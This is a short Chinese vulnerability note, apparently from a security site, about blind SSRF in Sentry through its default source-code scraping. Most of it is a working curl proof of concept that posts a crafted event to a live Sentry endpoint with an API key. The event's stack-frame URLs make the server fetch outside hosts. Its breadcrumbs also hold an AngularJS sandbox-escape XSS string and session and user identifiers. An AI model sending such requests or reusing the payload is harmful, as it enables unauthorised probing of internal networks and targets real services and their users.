Sentry是一个实时的事件日志和聚合平台,基于 Django 构建。
漏洞详情:
由于sentry默认开启source code scrapping ,导致可以从外部进行blind ssrf请求,未经授权的攻击者可以利用该漏洞探测内网服务。
POC:
```
curl -i -s -k -X $'POST' \
-H $'Host: errors.hackerone.net' -H $'Connection: close' -H $'Content-Length: 9031' -H $'Origin: https://hackerone.com' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36' -H $'Content-Type: application/csp-report' -H $'Accept: */*' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7' \
--data-binary $'{\"project\":\"30\",\"logger\":\"javascript\",\"platform\":\"javascript\",\"request\":{\"headers\":{\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36\",\"Referer\":\"https://avtohanter.ru/Business/Contractors/ContractorInfo?sessionid=40030075&id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c\"},\"url\":\"https://avtohanter.ru/Business/Contractors/EditContractor?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionId=40030075\"},\"exception\":{\"values\":[{\"type\":\"Error\",\"value\":\"Trying to get control scope but angular isn\'t ready yet or something like this\",\"stacktrace\":{\"frames\":[{\"filename\":\"https://avtohanter.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":110,\"colno\":81071,\"function\":\"XMLHttpRequest.o\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":96,\"colno\":75069,\"function\":\"XMLHttpRequest.<anonymous>\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":96,\"colno\":71510,\"function\":\"k\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":96,\"colno\":23681,\"function\":\"Object.fireWith [as resolveWith]\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":96,\"colno\":22924,\"function\":\"s\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js\",\"lineno\":1,\"colno\":724721,\"function\":\"Object.n.(anonymous function) [as success]\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js\",\"lineno\":1,\"colno\":725795,\"function\":\"Object.n.success\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":757703,\"function\":\"Object.executeInContext\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js\",\"lineno\":1,\"colno\":725917,\"function\":\"?\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js\",\"lineno\":1,\"colno\":723970,\"function\":\"c.json.c.toLowerCase.n.success.n.success\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/Business/Contractors/EditContractor?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionId=40030075\",\"lineno\":2446,\"colno\":299,\"function\":\"ajaxOptions.success\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":313620,\"function\":\"NotificationCenter.<anonymous>\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":316137,\"function\":\"NotificationCenterDropdown.setValue\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":542056,\"function\":\"NotificationCenterDropdown.setValue\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":665829,\"function\":\"NotificationCenterDropdown.setValue\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":666057,\"function\":\"NotificationCenterDropdown._scatter\",\"in_app\":true},{\"filename\":\"<anonymous>\",\"lineno\":null,\"colno\":null,\"function\":\"Array.forEach\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":666079,\"function\":\"?\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":714602,\"function\":\"ListClientBinding.output\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":713050,\"function\":\"ListClientBinding.output\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":448313,\"function\":\"NotificationCenterOuterList.setValue\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":683081,\"function\":\"NotificationCenterOuterList.getScope\",\"in_app\":true}]}}]},\"transaction\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"trimHeadFrames\":0,\"tags\":{\"AbonentId\":\"36053ca1-a898-43e3-90be-2bf69232bcf0\",\"UserId\":\"36053ca1-a898-43e3-90be-2bf69232bcf0\",\"OrganizationId\":\"c344ad73-f374-4bef-8629-8ebe1ebea57e\"},\"extra\":{\"session:duration\":357},\"breadcrumbs\":{\"values\":[{\"timestamp\":1530367897.368,\"category\":\"sentry\",\"message\":\"$parse:lexerr: Lexer Error: Unterminated quote at columns 47-67 [\'x=1} } };alert(1));] in expression [\'a\'.constructor.prototype.charAt=[].join;$eval(\'x=1} } };alert(1));].\",\"event_id\":\"57575ae92ea2477d8ba3665017601f81\",\"level\":\"error\"},{\"timestamp\":1530367897.373,\"message\":\"Error: [$parse:lexerr] Lexer Error: Unterminated quote at columns 47-67 [\'x=1} } };alert(1));] in expression [\'a\'.constructor.prototype.charAt=[].join;$eval(\'x=1} } };alert(1));].\\nhttp://errors.angularjs.org/1.5.8/$parse/lexerr?p0=Unterminated%20quote&p1=s%2047-67%20%5B\'x%3D1%7D%20%7D%20%7D%3Balert(1))%3B%5D&p2=\'a\'.constructor.prototype.charAt%3D%5B%5D.join%3B%24eval(\'x%3D1%7D%20%7D%20%7D%3Balert(1))%3B\\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:365\\n at hr.throwError (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:75995)\\n at hr.readString (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:77352)\\n at hr.lex (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:74150)\\n at vr.ast (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:80676)\\n at Er.compile (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:85908)\\n at Or.parse (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:100573)\\n at c (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:101408)\\n at p (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:63437)\\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:42036\\n at oe (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:42291)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40233)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ee (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:39604)\\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9411\\n at c.$eval (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:111066)\\n at c.$apply (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:111299)\\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9371\\n at Object.invoke (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:24205)\\n at o (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9292)\\n at Object.xe [as bootstrap] (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9579)\\n at Object.bootstrap (https://elba.kontur.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js:1:633795)\\n at Function.run (https://elba.kontur.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js:1:38538)\\n at https://elba.kontur.ru/Business/Contractors/EditContractor?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionId=40030075:3511:21 undefined\",\"level\":\"error\",\"category\":\"console\"},{\"timestamp\":1530367897.415,\"category\":\"sentry\",\"message\":\"Error: Trying to get control scope but angular isn\'t ready yet or something like this\",\"event_id\":\"2da3183f684d4236b845f3b980c8fabe\",\"level\":\"error\"},{\"timestamp\":1530367897.455,\"category\":\"ui.click\",\"message\":\"input#ContractorRequisitesEdit_ContractorShortName_Input.c-input.c-input_elastic[type=\\\"text\\\"]\"},{\"timestamp\":1530367897.54,\"type\":\"http\",\"category\":\"xhr\",\"data\":{\"method\":\"POST\",\"url\":\"https://elba.kontur.ru/Support/PortalAuth/SetPortalAuthCookie?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionid=40030075\",\"status_code\":200}},{\"timestamp\":1530367897.577,\"type\":\"http\",\"category\":\"xhr\",\"data\":{\"method\":\"GET\",\"url\":\"https://elba.kontur.ru/Notices/NotificationCenter/GetViewData?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionid=40030075&_=1530367897217\",\"status_code\":200}}]},\"user\":{\"id\":\"36053ca1-a898-43e3-90be-2bf69232bcf0\"},\"release\":\"mobile_analitcs_redirect_fix e1293c0084a3\",\"event_id\":\"64eaf55f0b6942f6949d0ae00b4e002v\"}' \
$'https://errors.hackerone.net/api/30/store/?sentry_version=7&sentry_client=raven-js%2F3.25.2&sentry_key=61c1e2f50d21487c97a071737701f598'
```
京公网安备 11010502034610号
暂无评论